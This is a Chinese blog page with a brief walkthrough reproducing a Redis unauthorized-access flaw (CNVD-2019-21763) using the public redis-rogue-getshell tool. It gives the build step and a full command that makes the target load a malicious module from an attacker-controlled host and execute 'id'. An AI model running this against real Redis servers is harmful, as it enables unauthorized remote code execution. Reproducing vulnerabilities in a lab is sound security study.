当前位置: 首页 > news >正文

Redis未授权访问-CNVD-2019-21763复现

news 2025/9/17 8:20:17

Redis未授权访问-CNVD-2019-21763复现

利用项目: https://github.com/vulhub/redis-rogue-getshell

解压后先进入到 RedisModulesSDK目录里面的exp目录下,make编译一下才会产生exp.so文件,后面再利用这个exp.so文件进行远程代码执行

需要python3环境

# 利用命令,命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"

进入到exp目录下make一下

image

来到 redis-master.py文件所属目录下 执行命令,查看id

image

命令执行成功

image

http://www.lryc.cn/news/246321.html

相关文章:

  • 汇编:常用的输入与输出
  • MYSQL基础之【正则表达式,事务处理】
  • Mysql并发时常见的死锁及解决方法
  • 二十九、微服务案例完善(数据聚合、自动补全、数据同步)
  • vue 目录树的展开与关闭
  • 【Docker】python flask 项目如何打包成 Docker images镜像 上传至阿里云ACR私有(共有)镜像仓库 集成Drone CI
  • 力扣labuladong——一刷day55
  • springboot实现验证码功能
  • 内测分发平台是否支持应用的微服务化部署
  • 1140. 最短网络,prim算法,模板题
  • 升级jdk17过程中,原来的jdk8下的webservice客户端怎样处理
  • Verilog基本语法概述
  • 论文阅读:C2VIR-SLAM: Centralized Collaborative Visual-Inertial-Range SLAM
  • 蓝桥杯刷题day01——字符串中的单词反转
  • Python---引用变量与可变、非可变类型
  • GDOUCTF2023-Reverse WP
  • Day43力扣打卡
  • elementui的table合并列,三个一组
  • HarmonyOS-Service服务开发(一)
  • FLASK博客系列4——再谈路由
  • sql之left join、right join、inner join的区别
  • 京东秒杀之秒杀详情
  • mobaxterm 下载、安装、使用
  • 办公技巧:Word中插入图片、形状、文本框排版技巧
  • apple macbook M系列芯片安装 openJDK17
  • C语言——打印出所有的“水仙花数”
  • <HarmonyOS第一课>应用程序框架 【课后考核】
  • 自动驾驶学习笔记(十一)——高精地图
  • HCIA-H12-811题目解析(2)
  • Docker-简介、基本操作